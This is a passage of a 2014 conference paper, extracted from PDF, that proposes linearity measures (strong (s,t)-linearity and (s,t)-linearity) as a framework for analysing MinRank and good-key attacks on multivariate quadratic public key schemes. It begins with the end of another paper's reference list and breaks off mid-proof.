[4] A. Fonseca and T. Vazão, “Applicability of position-based routing for
VANET in highways and urban environment,” Journal of Network and
Computer Applications, vol. 36, Mar. 2013, pp. 961-973, doi:
10.1016/j.jnca.2012.03.009.
[5] S. Capkun and J. P. Hubaux, “Secure positioning of wireless devices
with application to sensor networks,” IEEE INFOCOM, Mar. 2005, pp.
1917-1928, doi: 10.1109/INFCOM.2005.1498470.
[6] S. Capkun, M. Cagalj, and M. Srivastava, “Secure localization with
hidden and mobile base stations,” IEEE INFOCOM, Apr. 2006, pp. 110, doi: 10.1109/INFOCOM.2006.302.
[7] H. Buhrman et. al., “Position-Based Quantum Cryptography:
Impossibility and Constructions,” CRYPTO 2011, Aug. 2011, pp. 429446, doi: 10.1007/978-3-642-22792-9_24.
[8] H. Buhrman et. al., “Position-Based Quantum Cryptography:
Impossibility and Constructions,” SIAM J. Comput., vol. 43, Jan. 2014,
pp. 150–178, doi: 10.1137/130913687.
[9] T.Y. Wang and Z.L. Wei, “One-time proxy signature based on
quantum cryptography,” Quantum Information Processing, vol. 11,
Feb. 2012, pp. 455-463, doi: 10.1007/s11128-011-0258-6.
[10] R. Canetti, “Universally composable security:a new paradigm for
cryptographic protocols,”., 2001. Proceedings. 42nd IEEE Symposium
on Foundations of Computer Science, Oct. 2001, pp. 136-145, doi:
10.1109/SFCS.2001.959888.
[1]
156
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Linearity Measures for Multivariate Public Key
Cryptography
Simona Samardjiska
Danilo Gligoroski
Department of Telematics, NTNU
Trondheim, Norway
FCSE, “Ss Cyril and Methodius” University
Skopje, Republic of Macedonia
simonas@item.ntnu.no
Department of Telematics, NTNU
Trondheim, Norway
danilog@item.ntnu.no
Abstract—We propose a new general framework for the security
of Multivariate Quadratic (MQ) public key schemes with respect
to attacks that exploit the existence of linear subspaces. We adopt
linearity measures that have been used traditionally to estimate
the security of symmetric cryptographic primitives, namely,
the nonlinearity measure for vectorial functions introduced by
Nyberg, and the (s, t)–linearity measure introduced recently
by Boura and Canteaut. We redefine some properties of MQ
cryptosystems in terms of these known symmetric cryptography
notions, and show that our new framework is a compact generalization of several known attacks in MQ cryptography against
single field schemes. We use the framework to explain various
pitfalls regarding the successfulness of these attacks. Finally, we
argue that linearity can be used as a solid measure for the
susceptibility of MQ schemes to these attacks, and also as a
necessary tool for prudent design practice in MQ cryptography.
Keywords–Strong (s, t)–linearity; (s, t)–linearity; MinRank; good
keys; separation keys.
I.
I NTRODUCTION
In the past two decades, as a result of the advancement in
quantum algorithms, the crypto community showed increasing
interest in algorithms that would be potentially secure in
the post quantum world. One of the possible alternatives
are Multivariate Quadratic (MQ) public key cryptosystems
based on the NP-hard problem of solving quadratic polynomial
systems of equations over finite fields.
Many different MQ schemes emerged over the years,
most of which fall into two main categories - single field
schemes, including UOV (Unbalanced Oil and Vinegar) [1],
Rainbow [2], TTM (Tame Transformation Method) [3], STS
(Stepwise Triangular System) [4], MQQ-SIG (Multivariate
Quadratic Quasigroups - Signature scheme) [5], TTS (Tame
Transformation Signatures) [6], EnTTS (Enhanced TTS) [7]
and mixed field schemes including C∗ [8], SFLASH [9], HFE
(Hidden Field Equation) [10], MultiHFE [11][12], QUARTZ
[13]. Unfortunately, most of them have been successfully
cryptanalysed [4][14][15][16][17]. Three major types of attacks have proven devastating for MQ cryptosystems:
i. MinRank attacks – based on the problem of finding a low
rank linear combination of matrices, known as MinRank
[18]. Although NP-hard, the instances of MinRank arising
from MQ schemes are often easy, and provide a powerful
tool against single field schemes [4][14].
ii. Equivalent Keys attacks – based on finding an equivalent
key for the respective scheme. The concept was introduced
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
by Wolf and Preneel [19], and later further developed
by Thomae and Wolf [16] to the generalization of good
keys. The attacks on TTM [14], STS [4][16], HFE and
MultiHFE [15][17] can all be seen from this perspective.
iii. Differential attacks – based on specific invariants of the
differential of a given public key, such as the dimension of
the kernel, or some special symmetry. It was introduced
by Fouque et al. in [20] to break the perturbed version
of the C ∗ scheme PMI [21], and later also used in
[22][23][24][25].
Interestingly, the history of MQ cryptography has witnessed cases where, despite the attempt to inoculate a scheme
against some attack, the enhanced variant has fallen victim to
the same type of attacks. Probably, the most famous example
is the SFLASH [9] signature scheme, that was build using the
minus modifier on the already broken C ∗ [26], and selected
by the NESSIE European Consortium [27] as one of the
three recommended public key signature schemes. It was later
broken by Dubois et al. in [24][25] using a similar differential
technique as in the original attack on C ∗ . Another example
is the case of Enhanced STS [28], which was designed to be
resistant to rank attacks, that broke its predecessor STS. Even
the authors themselves soon realized that this was not the case,
and the enhanced variant is vulnerable to a HighRank attack.
Such examples indicate that the traditional “break and
patch” practice in MQ cryptography should be replaced by
a universal security framework. Indeed, in the last few years,
several proposals have emerged that try to accomplish this
[29][30][31]. Notably, the last two particularly concentrate on
the properties of the differential of the used functions, a well
known cryptanalytic technique from symmetric cryptography.
We will show here that another well known measure from
symmetric cryptography, namely linearity, is fundamental for
the understanding of the security of MQ schemes.
A. Our Contribution
We propose a new general framework for the security of
MQ schemes with respect to attacks that exploit the existence
of linear subspaces. Our framework is based on two linearity
measures that we borrow from symmetric cryptography, used
to measure the resistance of symmetric primitives to linear
cryptanalysis (cf. Matsui’s attack on the DES cipher [32]). To
our knowledge, this is the first time that the notion of linearity
has been used to analyse the security of MQ schemes.
157
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
In particular, we take the linearity measure for vectorial
functions introduced by Nyberg [33] already in 1992, and
the (s, t)–linearity measure introduced recently by Boura and
Canteaut [34] at FSE’13, and adopt them suitably in the
context of MQ cryptography. We extend the first to a new
notion of strong (s, t)–linearity in order to include an additional important parameter of the size of the vector subspace
of the components of the function that have common linear
space. We show that strong (s, t)–linearity and (s, t)–linearity
are intrinsically connected to the security of MQ schemes,
and can be used to explain almost all attacks on single field
schemes, such as rank attacks, good keys attacks and attacks on
oil and vinegar schemes. Indeed this is possible, since all these
attacks share a common characteristic: They try to recover a
subspace with respect to which the public key of an MQ
scheme is linear. Therefore they can all be considered as linear
attacks on MQ schemes.
We devise two generic attacks that separate the linear
subspaces, and that are a generalization of the aforementioned
known attacks. We present one of the possible modellings of
the attacks using system solving techniques, although other
techniques are possible as well. Using the properties of strong
(s, t)–linearity and (s, t)–linearity, we show what are the best
strategies for the attacks. Notably, the obtained systems of
equations are equivalent to those that can be obtained using
good keys [16], a technique based on equivalent keys and
missing cross terms. By this we show that our new framework
provides a different, elegant perspective on why good keys
exist, and why they are so powerful in cryptanalysis.
Moreover, we use our framework to explain various pitfalls
regarding design choices of MQ schemes and the successfulness of the linear attacks against them. Finally, we argue that
linearity can be used as a solid measure for the susceptibility
of MQ schemes to linear attacks, and also as a necessary tool
for prudent design practice in MQ cryptography.
B. Organization of the Paper
The paper is organized as follows. In Section II, we briefly
introduce the design principles of MQ schemes and also
recall the well known measure of nonlinearity of functions.
In the next Section III, we introduce the notion of strong
(s, t)–linearity, which is basically an extension of the standard
linearity measure and review the recently introduced (s, t)–
linearity measure. In Sections IV and V, we show how the
two linearity measures fit in the context of MQ cryptography.
Some discussion on the matter proceeds in Section VI, and the
conclusions are presented in Section VII.
II.
P RELIMINARIES
Throughout the text, Fq will denote the finite field of q
elements, where q = 2d , and a = (a1 , . . . , an )⊺ will denote a
vector from Fnq .
A. Vectorial Functions and Quadratic Forms
Definition 1: Let n, m be two positive integers. The functions from Fnq to Fm
q are called (n, m) functions or vectorial
functions. For an (n, m) function f = (f1 , . . . , fm ), fi are
called the coordinate functions of f .
Classically, a quadratic form
X
f (x1 , . . . , xn ) =
γij xi xj : Fnq → Fq
1≤i≤j≤n
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
can be written as x⊺ Fx using its matrix representation F. This
matrix is constructed differently depending on the parity of
the field characteristic. In odd characteristic, F is chosen to
be a symmetric matrix, where Fij = γij /2 for i 6= j and
Fij = γij for i = j. Over fields Fq of even characteristic F
can not be chosen in this manner, since (γij +γji )xi xj = 0 for
e be the uniquely defined upper-triangular
i 6= j. Instead, let F
eij = γij for i ≤ j. Now, we obtain
representation of f , i.e., F
e+F
e⊺ . Note that, in this case only
a symmetric form by F := F
the upper-triangular part represents the according polynomial
and F is always of even rank.
B. MQ Cryptosystems
The public key of a MQ cryptosystem is usually given by
an (n, m) function P(x) = (p1 (x), . . . , pm (x)) : Fnq → Fm
q ,
where
n
X (s)
X
(s)
ps (x) =
γ
eij xi xj +
βei xi + α
e(s)
i=1
1≤i≤j≤n
for every 1 6 s 6 m, and where x = (x1 , . . . , xn )⊺ .
The public key P is obtained by masking a structured central (n, m) function F = (f1 , . . . , fm ) using two secret linear
transformations S, T ∈ GLn (Fq ) and defined as P = T ◦F ◦S.
We denote by P(s) and F(s) the (n × n) matrices describing
the homogeneous quadratic part of ps and fs , respectively.
Example 1:
i. The internal map of UOV [1] is defined as F : Fnq → Fm
q ,
with central polynomials
fs (x) =
X
(s)
γij xi xj +
X
(s)
γij xi xj +
i∈V,j∈O
i∈V,j∈V
n
X
(s)
βi xi +α(s) ,
i=1
(1)
for every s = 1 . . . m, where n = v + m, V = {1, . . . , v}
and O = {v + 1, . . . , n} denote the index sets of the
vinegar and oil variables, respectively. The public map P
is obtained by P = F ◦S, since the affine T is not needed
(Indeed, any component w⊺ · F has again the form (1)).
ii. The internal map F : F2n → F2n of C ∗ [8] is defined by
F(x) = x2
ℓ
+1
, where gcd(2ℓ + 1, 2n − 1) = 1.
This condition ensures that F is bijective.
iii. The representatives of the family of Stepwise Triangular
Systems (STS) [4] have an internal map F : Fnq → Fm
q
defined as follows. Let L be the number of layers, and
let ri , 0 ≤ i ≤ L be integers such that 0 = r0 < r1 <
· · · < rL = n. The central polynomials in the k-th layer
are defined by
fi (x1 , . . . , xn ) = fi (x1 , . . . , xrk ),
rk−1 + 1 ≤ i ≤ rk .
We describe briefly two important cryptanalytic tools in
MQ cryptography, that are of particular interest for us.
1) The MinRank Problem: The problem of finding a low
rank linear combination of matrices is a known NP-hard linear
algebra problem [35] known as MinRank in cryptography [18].
It has been shown that it underlies the security of several MQ
cryptographic schemes [4][14][15]. It is defined as follows.
MinRank M R(n, r, k, M1 , . . . , Mk )
Input: n, r, k ∈ N, where M1 , . . . , Mk ∈ Mn×n (Fq ).
158
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Question: Find – if any – a k-tuple (λ1 , . . . , λk )
Fkq \ {(0, 0, . . . , 0)} such that:
!
k
X
λi Mi 6 r.
Rank
∈
i=1
2) Good Keys: The concept of equivalent keys formally
introduced by Wolf and Preneel in [36] is fundamentally
connected to the security of MQ schemes. In essence, any key
that preserves the structure of the secret map is an equivalent
key. This natural notion was later generalized by Thomae and
Wolf [16] to the concept of good keys that only preserve some
of the structure of the secret map. Good keys improve the
understanding of the level of applicability of MinRank against
MQ schemes, and are a powerful tool for cryptanalysis. Good
keys are defined as follows.
Let k, 1 ≤ k ≤ m and F = {f1 , . . . , fm } be a set of
polynomials of Fq [x1 , . . . , xn ]. Let I (k) ⊆ {xi xj | 1 ≤ i ≤
j ≤ n} be a subset of the degree-2 monomials, and let F =
I
P
(k)
{f1 (1) , . . . , fm (m) } where fk (k) :=
γij xi xj .
I
I
I
J
J
C. Linearity of Vectorial Functions
Linearity is one the most important measures for the
strength of an (n, m) function for use in symmetric cryptoprimitives. We provide here some well known results about
this notion.
Definition 3 ([33]): The linearity of an (n, m) function f
is measured using its Walsh transform, and is given by
X
⊺
⊺
|
L(f ) =
max
(−1)w ·f (x)+u ·x |
n
m
x∈Fn
q
The nonlinearity of an (n, m) function f is the Hamming
⊺ distancembetween the set of nontrivial components
w · f |w ∈ Fq \ {0} of f and the set of all affine functions.
It is given by
1
N (f ) = (q − 1)(q n−1 − L(f )).
q
Definition 4: A vector w ∈ Fnq is called a linear structure
of an (n, m) function f if the derivative Dw f (x) = f (x +
w) − f (x) is constant, i.e., if
f (x + w) − f (x) = f (w) − f (0)
Fnq .
for all x ∈
The space generated by the linear structures of
f is called the linear space of f .
Nyberg [33] proved the following results.
Proposition 1 ([33]): The dimension of the linear space
of an (n, m) function is invariant under bijective linear transformations of the input space and of the coordinates of the
function.
Proposition 2 ([33]): Let x⊺ Fx be the matrix representation of a quadratic form f . Then, the linear structures of f
form the linear subspace Ker(F).
Copyright (c) IARIA, 2014.
fi (x, y) = L(πi (x)y) + gi (x),
xi xj ∈I (k)
′
′
Definition 2 ([16]): Let
(F, S, T ), (F , S , T ′ )
∈
Fq [x1 , . . . , xn ]m × GLn (Fq ) × GLm (Fq ) Let also J (k) ( I (k)
for all k, 1 ≤ k ≤ m with at least one J (k) 6= ∅. We call
(F ′ , S ′ , T ′ ) ∈ Fq [x1 , . . . , xn ]m × GLn (Fq ) × GLm (Fq ) a
good key of (F, S, T ) if and only if:
T ◦ F ◦S = T ′ ◦ F ′ ◦S ′ ∧ F = F ′
.
w∈Fq \{0},u∈Fq
The linear structures can provide a measure for the distance
of the quadratic forms from the set of linear forms. Indeed the
link is given by the following theorem.
Theorem 1 ([33]): 1) Let x⊺ Fx be the matrix representation of a quadratic form f , and rlet Rank(F) = r. Then
the linearity of f is L(f ) = q n− 2 .
2) Let f be a quadratic (n, m) function, and let x⊺ Fw x
denote the matrix representation of a component
w⊺ · f .
n− r2
, where r =
Then the linearity of f is L(f ) = q
min{Rank(Fw )|w ∈ Fm
q }.
It is well-known that the linearity of an (n,nm) function
is bounded from below by the value L(f ) > q 2 , known as
the covering radius bound. It is tight for every even n, and
functions that reach the bound are known as bent functions. It
is also known [37] that bent functions exist only for m 6 n/2.
A class of quadratic bent functions that has been extensively
studied in the literature is the class of Maiorana-McFarland
bent functions [38]. In general, an (n, m) function from the
Maiorana-McFarland class has the form f = (f1 , f2 , . . . , fm ) :
F2n/2 × F2n/2 → Fm
2 where each of the components fi is
ISBN: 978-1-61208-376-6
(2)
where πi are functions on F2n/2 , L is a linear function onto
Fm
2 and gi are arbitrary (n/2, m) functions. Nyberg [37]
showed that f is an (n, m)-bent function if every nonzero
linear combination of the functions πi , i ∈ {1, . . . , m} is a
permutation on F2n/2 .
Since the minimum linearity (maximum nonlinearity) is
achieved only for m 6 n/2, permutations can not reach the
covering radius bound. But, they can reach the SidelnikovChabaud-Vaudenay (SCV) bound [39], valid for m ≥ n − 1,
n+1
which for m = n odd, can be stated as: L(f ) > q 2 . (n, n)
functions, where n is odd, that reach the SCV bound with
equality, are called Almost Bent (AB) functions.
As a direct consequence of Theorem 1 and the aforementioned bounds we have that quadratic (n, m) functions are
i. bent if and only if Rank(Fw ) = n for every w⊺ · f ,
ii. almost bent if and only if Rank(Fw ) = n − 1 for every
w⊺ · f .
III.
S TRONG (s, t)– LINEARITY AND (s, t)– LINEARITY
We will show in the next sections that linearity plays a
significant role for the security of MQ cryptosystems. However, in order to better frame it for use in MQ cryptography,
we introduce the following notion of strong (s, t)–linearity.
The motivation for this more precise measure comes from the
recently introduced notion of (s, t)–linearity [34], that will also
be discussed here in the context of MQ cryptography.
Definition 5: Let f be an (n, m) function. Then, f is said
to be strongly (s, t)–linear if there exist two linear subspaces
V ⊂ Fnq , W ⊂ Fm
q with Dim(V ) = s, Dim(W ) = t such that
for all w ∈ W , V is a subspace of the linear space of w⊺ · f .
Compared to the standard measure for linearity given in
Definition 3, that actually measures the size of the vector space
V , strong (s, t)–linearity also measures the size of the vector
space W . We will see that this is particularly important in
the case of MQ cryptosystems. We next provide some basic
properties about strong (s, t)–linearity.
Proposition 3: If a function is strongly (s, t)–linear, then it
is also strongly (s − 1, t)–linear, and strongly (s, t − 1)–linear.
Proof: Let f be strongly (s, t)–linear. Then there exists
spaces V, W of Dim(V ) = s and Dim(W ) = t, such that
159
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
every a ∈ V is a linear structure of all the components w⊺ f ,
where w is a basis vector of W . From here, a is also a linear
structure of any subspace of W of dimension t − 1. Therefore,
f is also strongly (s, t − 1)–linear. Similarly, the elements of
any subspace of V of dimension s − 1 are linear structures of
all the components w⊺ f , and thus, f is also strongly (s−1, t)–
linear.
Proposition 4: Let f be an quadratic (n, m) function and
V ⊂ Fnq and W ⊂ Fm
q with Dim(V ) = s, Dim(W ) = t be
two linear spaces. Then f is strongly (s, t)–linear with respect
to V, W if and only if the function fW corresponding to all
components w⊺ · f , w ∈ W can be written as
fW (x, y) = gW (x) + LW (y)
(3)
Fnq
Ftq
where
is a direct sum of U and V , gW : U →
is a
quadratic function and LW : V → Ftq is a linear function.
Proof: From Definition 5, f is strongly (s, t)–linear with
respect to V, W if and only if V is a subspace of the linear
space of w⊺ · f , for all w ∈ W . Now, for w a basis vector of
W , w⊺ · f can be written as w⊺ · f (x, y) = gw (x) + Lw (y)
where y ∈ V belongs to the linear space of w⊺ · f . Combining
all the components for a basis of W we obtain the form (3).
Proposition 5: Let f be a quadratic (n, m) function. Then
f is strongly (s, t)–linear with respect to V, W if and only
if the function fW corresponding to all components w⊺ · f ,
w ∈ W is such that all its derivatives Da w⊺ · f , with a ∈ V
are constant.
Recently, Boura and Canteaut [34] introduced a new measure for the propagation of linear relations through S-boxes,
called (s, t)-linearity.
Definition 6 ([34]): Let f be an (n, m) function. Then, f
is said to be (s, t)–linear if there exist two linear subspaces
V ⊂ Fnq , W ⊂ Fm
q with Dim(V ) = s, Dim(W ) = t such that
for all w ∈ W , w⊺ · f has degree at most 1 on all cosets of V .
Similarly as for strong (s, t)–linearity, it is true that
Proposition 6 ([34]): If a function is (s, t)–linear, then it
is also (s − 1, t)–linear, and (s, t − 1)–linear.
Boura and Canteaut [34] proved that any (s, t)–linear
function “contains” a function of the Maiorana-McFarland
class, in the following sense.
Proposition 7 ([34]): Let f be an (n, m) function and
V ⊆ Fnq and W ⊆ Fm
q with Dim(V ) = s, Dim(W ) = t be
two linear spaces. Then f is (s, t)–linear with respect to V, W
if and only if the function fW corresponding to all components
w⊺ · f , w ∈ W can be written as
fW = M (x) · y + G(x)
n
where Fq is the direct sum of U and V , G is
U to Ftq and M (x) is a t × s matrix whose
a function from
coefficients are
functions defined on U .
A useful characterization of (s, t)–linearity, resulting from
the properties of the Maiorana-McFarland class is through second order derivatives defined by Da,b f = Da Db f = Db Da f .
Proposition 8 ([34]): Let f be an (n, m) function. Then f
is (s, t)–linear with respect to V, W if and only if the function
fW corresponding to all components w⊺ · f , w ∈ W is such
that all its second order derivatives Da,b w⊺ · f , with a, b ∈ V
vanish.
The two measures of linearity, even though they measure
different linear subspaces are also interconnected. The following two propositions illustrate this connection.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Proposition 9: If a function is strongly (s, t)–linear, then
it is also (s, t)–linear.
Proposition 10: If a quadratic (n, m) function f is (⌈ n2 ⌉+
s, 1)–linear than it is strongly (2s, 1)–linear.
Proof: From Proposition3 [34] we have the fact that
a (s, 1)–linear function has linearity L(f ) > q s (This
comes from the fact that the linearity of a function is lower
bounded by the linearity of any of its components.) Thus,
if a quadratic (n, m) function is (⌈ n2 ⌉ + s, 1)–linear, then
n
r
L(f ) > q ⌈ 2 ⌉+s . From Theorem1 L(f ) = q n− 2 , where
m
r
r = min{Rank(Fw )|w ∈ Fq }. From here n − 2 > ⌈ n2 ⌉ + s
and further n − 2s > r. Hence f is strongly (2s, 1)–linear.
In the next two sections, we will provide a general
framework for the security of MQ schemes against linear
cryptanalysis using the notions of strong (s, t)–linearity and
(s, t)–linearity.
IV.
T HE STRONG (s, t)– LINEARITY MEASURE FOR MQ
SYSTEMS
In this section, we show that strong (s, t)–linearity is
fundamentally connected to the susceptibility of an MQ
scheme to MinRank attacks and good keys attacks.
From Proposition 2 we have the following theorem.
Theorem 2: Let f = (f1 , f2 , . . . , fm ) be a quadratic
(n, m) function, and let F1 , F2 , . . . , Fm be the matrix representations of the coordinates of f . Then, the MinRank problem
M R(n, r, m, F1 , F2 , . . . , Fm ) has a solution if and only if f
is strongly (n − r, 1)–linear.
Proof: We see that v = (v1 , . . . , vn ) ∈ Fnq \ {0} is a solution to the MinRank problem!M R(n, r, m, F1 , F2 , . . . , Fm )
n
X
if and only if Rank
vi Fi 6 r, that is, if and only if
i=1
!!
n
X
> n − r, i.e., from Proposition 2, if
Dim Ker
v i Fi
i=1
and only if v ⊺ · f has at least n − r linearly independent linear
structures. Taking W to be the space generated by the vector
v and V to be the linear space of v ⊺ · f , from Definition 5 the
last is equivalent to f being strongly (n − r, 1)–linear.
Example 2: From Theorem 2, it is clear that bent functions
are resistant to MinRank attacks, since no linear combination
of the components of the function has smaller rank than n.
Thus, regarding MinRank attacks, bent functions are optimal
for use as a secret map in MQ cryptosystems.
Example 3: Regarding encryption MQ schemes, a natural
conclusion would be that AB permutations are the most
suitable for use. One of the most scrutinized AB permutations
are the Gold functions defined over Fqn for odd n by:
f (x) = xq
ℓ
+1
, gcd(q ℓ + 1, q n − 1) = 1, gcd(ℓ, n) = 1
where the first condition guarantees balancedness, and the
second AB-ness. Notably, one of the most famous MQ
schemes, the C ∗ scheme, uses an AB function, although there
are variants that do not meet the second condition [21].
As mentioned before, AB functions have Rank(Fv ) =
n − 1 for any component v ⊺ · f . This means that each of
the components have a linear space of dimension 1, and no
two components share a linear space, i.e., AB functions are
only strongly (1, 1)–linear. Hence, MinRank for r = n − 1 is
trivially satisfied and does not reveal anything more about the
structure of the map.
160
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The example of Gold functions from Example 3 implies
that although MinRank on its own can be a good indicator
of a weakness in a scheme, it does not provide a sufficient
condition for mounting a successful attack. A better framework
for the applicability of MinRank is provided by the concept
of good keys (cf. Section II-B2). It should be emphasized that
the definition of good keys (Definition 2), does not explicitly
state the structure that is being preserved, thus, providing
a framework even for structures not yet discovered. On the
other hand, the motivation for good keys comes from the
Rainbow band separation attack [40], that exploits (among
others) a particular weakness connected to the presence of
linear structures in the secret map. Moreover, known attacks
that use MinRank, as well as other applications of good keys,
again take advantage of the same property. Hence, we give a
new definition for the special type of keys that separate the
space of linear structures. This definition comes as a direct
consequence of strong (s, t)–linearity. Later, we will also take
a look at another weakness that the Rainbow band separation
attack and its generalizations take advantage of, and we will
also define the corresponding keys. We will call both types of
keys separation keys.
Let V be a subspace of Fnq of dimension k ≤ n, and let
SV be an invertible matrix such that k of its rows form a basis
of V . We note that the rest of the columns of the matrix can
be arbitrary, as long as the matrix is invertible.
Definition 7: Let
(F, S, T ), (F ′ , S ′ , T ′ )
∈
m
Fq [x1 , . . . , xn ]
× GLn (Fq ) × GLm (Fq ) and let
P = T ◦ F ◦S = T ′ ◦ F ′ ◦S ′ . We call (F ′ , S ′ , T ′ ) a
strong (s, t) separation key for P if P is strongly (s, t)–
linear with respect to two spaces V and W , Dim(V ) = s,
Dim(W ) = t and
S ′ = SV⊺ , T ′ = TW .
A strong (s, t) separation key separates the components of
the public key that have a non empty common linear space.
As a direct consequence of Definition 7 we have that:
Proposition 11: If (F ′ , S ′ , T ′ ) is a strong (s, t) separation
key for P, then it is also a good key for P.
Many MQ cryptosystems, proposed so far have strong
separation keys. As mentioned before, Rainbow [2] is one
of the examples, but also all STS cryptosystems ([3], [4]),
and all MQ cryptosystem that combine a layered structure
with other types of design principles, including among others
Branched C ∗ [41], MQQ-SIG [5], TTS [6], EnTTS [7], MFE
[42]. Table I summarizes the different strong separation keys
for some of these schemes.
TABLE I. E XAMPLES OF STRONG (s, t) SEPARATION KEYS FOR SOME MQ
CRYPTOSYSTEMS
scheme
strong (s, t) separation keys
P
P
( i ni , n − i n i )
parameters
Branch.C ∗ (n1 , . . . , nb )
STS
Rainbow
MQQ-SIG
MFE
EnTTS
(r1 , . . . , rL )
(n − rk , rk ), k = 1, . . . , L − 1
(v1 , o1 , o2 ) = (18, 12, 12)
(12, 12)
(q, d, n, r) = (2, 8, 160, 80) (k, 80 − k), k = 1, . . . , 79
(q k , n, m) =
(2k, 10k), (4k, 4k),
((2256 )k , 12, 15)
(6k, 2k), (8k, k)
(n, m) = (32, 24)
(10, 14),(14, 10)
The known attacks on these systems, can all be considered as separation key attacks involving different techniques
and optimizations. The framework of strong (s, t) linearity
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
provides a unified way of looking at these attacks, and a
single measure that can be used as criteria for the parameters
of schemes that have strong separation keys. The next two
theorems explain in detail how to mount a generic strong
separation key attack, what is the complexity of the attack,
and what is the best strategy for attack when the existence of
a strong separation key is known. We decided to present the
attack by representing the conditions for strong (s, t) linearity
as systems of equations. This way we obtain completely
equivalent systems to the ones that can be obtained using good
keys, thus, offering another elegant point of view on why good
keys exist. Note that this is not the only technique that can be
used to recover strong (s, t) separation keys (for example we
can use probabilistic approach). However, it provides a clear
picture of the cases when the existence of a particular strong
separation key is devastating for the security of MQ schemes.
Theorem 3: Let it be known that a strong (s, t) separation
key exists for a given MQ public key P : Fnq → Fm
q with
matrix representations Pw of a component w⊺ · P.
i. The task of finding a strong (s, t) separation key (SV⊺ , TW )
is equivalent to solving the system of bilinear equations
Pw(i) · a(j) = 0, i ∈ {1, . . . , t}, j ∈ {1, . . . , s},
(4)
in the unknown basis vectors w(i) of the space W , and
the unknown basis vectors a(j) of the space V .
ii. The complexity of recovering the strong (s, t) separation
key through solving the system (4) is
ω
(n − s)s + (m − t)t + dreg
(5)
O t·s·n·
dreg
where dreg = min{(n−s)s+(m−t)t}+1, and 2 6 ω 6 3
is the linear algebra constant.
Proof: i. From Definition7 the existence of a strong
(s, t) separation key (SV⊺ , TW ) means that P is strongly
(s, t)–linear with respect to two spaces V, W of dimension
Dim(V ) = s, Dim(W ) = t. So the task is to recover these
two spaces, i.e., to recover some bases {a(1) , . . . , a(s) } and
{w(1) , . . . , w(t) } of V and W , respectively. From Definition 5
and Proposition 2, w ∈ W and a ∈ V if and only if a is in the
kernel of Pw , i.e., if and only if Pw ·a = 0. Let the coordinates
of the basis vectors {a(1) , . . . , a(s) } and {w(1) , . . . , w(t) } be
unknowns. In order to insure that they are linearly independent,
we fix the last s coordinates of a(j) to 0 except the (n−j +1)th coordinate that we fix to 1, and similarly we fix the first t
coordinates of w(i) to 0 except the i-th coordinate that we fix to
1. This way we can form the bilinear system (4). The solution
of the system will yield the unknown bases of U and W . Note
that if we get more than one solution, any of the obtained
solutions will suffice. However, it can also happen that the
system has no solutions. This is due to the fixed coordinates
in the basis vectors, which can be done in the particular manner
1 2
) . Still, if no
with probability of approximately (1 − q−1
solutions, we can randomize the function P by applying linear
transformation to the input space and the coordinates of the
function, since from Proposition 1, this preserves the strong
(s, t)–linearity of P.
ii. From i., the system (4) consists of t · s · n bilinear
equations in two sets of variables of sizes ν1 = (n − s)s and
ν2 = (m − t)t, bilinear with respect to each other. The best
known estimate of the complexity of solving a random system
of bilinear equations is due to Faugere et al. [43], which says
161
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
that for the grevlex ordering, the degree of regularity of a
generic affine bilinear zero-dimensional system over a finite
field is upper bounded by
dreg ≤ min(ν1 , ν2 ) + 1.
(6)
Now, we use the F5 algorithm for computing a grevlex Gröbner
basis of a polynomial system [44][45], that has a complexity
of
ω
ν1 + ν2 + dreg
,
(7)
O µ·
dreg
for solving a system of ν1 + ν2 variables and µ equations
(2 6 ω 6 3 is the linear algebra constant). Using (6) and (7),
we obtain the complexity given in (5).
The complexity given in (5) is clearly not polynomial,
since dreg depends on n. However, it can be substantially
improved using the properties of strong (s, t)–linearity from
Proposition 3. This is shown in the next theorem.
Theorem 4: Let it be known that a strong (s, t) separation
key exists for a given MQ public key P : Fnq → Fm
q with
matrix representations Pw of a component w⊺ · P.
i. The task of finding a strong (s, t) separation key can be
reduced to
1. Solving the system of bilinear equations
(j)
P(i)
= 0, i ∈ {1, . . . , c1 }, j ∈ {1, . . . , c2 }, (8)
w ·a
in the unknown basis vectors w(i) of the space W , and
the unknown basis vectors a(j) of the space V , where
c! , c2 are small integers chosen appropriately.
2. Solving the system of linear equations
(j)
P(i)
= 0, i ∈ {c1 +1, ..., t}, j ∈ {1, ..., c2 },
w ·a
(i)
(j)
Pw · a = 0, i ∈ {1, ..., c1 }, j ∈ {c2 +1, ..., s}, (9)
in the unknown basis vectors w(i) , i ∈ {c1 + 1, . . . , t}
of the space W , and the unknown basis vectors a(j) ,
j ∈ {c2 + 1, . . . , s} of the space V .
ii. The complexity of recovering the strong (s, t) separation
key using the procedure from i. is
ω
(n − s)c2 + (m − t)c1 + dreg
(10)
O
dreg
where dreg = min{(n − s)c2 , (m − t)c1 }.
Proof: i. The crucial observation that enables us to prove
this part, is a consequence of Proposition 3. Recall that it
states that strong (s, t)–linearity implies strong (s − 1, t) and
strong (s, t − 1)–linearity. Even more, if P is strongly (s, t)–
linear, with respect to V = Span{a(1) , . . . , a(s) }, W =
Span{w(1) , . . . , w(t) }, then it is strongly (s−1, t)–linear with
respect to V1 , W , where V1 ⊂ V , and strongly (s, t − 1)–
linear with respect to V, W1 , where W1 ⊂ W . Hence, there
exist two arrays of subspaces V ⊃ V1 ⊃ · · · ⊃ Vs−1 and
W ⊃ W1 ⊃ · · · ⊃ Wt−1 , such that P is strongly (s − i, t − j)–
linear with respect to Vi = Span{a(1) , . . . , a(s−i) }, Wj =
Span{w(1) , . . . , w(t−j) }. Thus, we can first recover the bases
of some spaces Vs−c2 , Wt−c1 , and then extend them to the
bases of V, W . Again, similarly, as in the proof of Theorem 3,
we take the coordinates of the basis vectors {a(1) , . . . , a(s) }
and {w(1) , . . . , w(t) } of V and W to be the unknowns, and
again fix the last s coordinates of a(j) to 0 except the
(n − j + 1)-th coordinate that we fix to 1, and fix the first
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
